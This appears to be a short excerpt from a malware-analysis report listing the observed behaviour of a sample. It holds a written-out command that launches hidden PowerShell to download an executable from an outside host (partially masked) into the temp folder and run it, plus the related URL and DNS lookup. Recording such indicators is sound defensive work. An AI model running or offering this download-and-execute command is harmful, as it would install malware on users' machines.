Technical Information
- http://cn####8.tmweb.ru/win.exe as %temp%\exploit.exe
- http://cn####8.tmweb.ru/win.exe
- DNS ASK cn####8.tmweb.ru
- '<SYSTEM32>\cmd.exe' /c PowerShell.exe -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://cn####8.tmweb.ru/win.exe','%temp%\exploit.exe');Start-Process '%temp%\exploit.exe'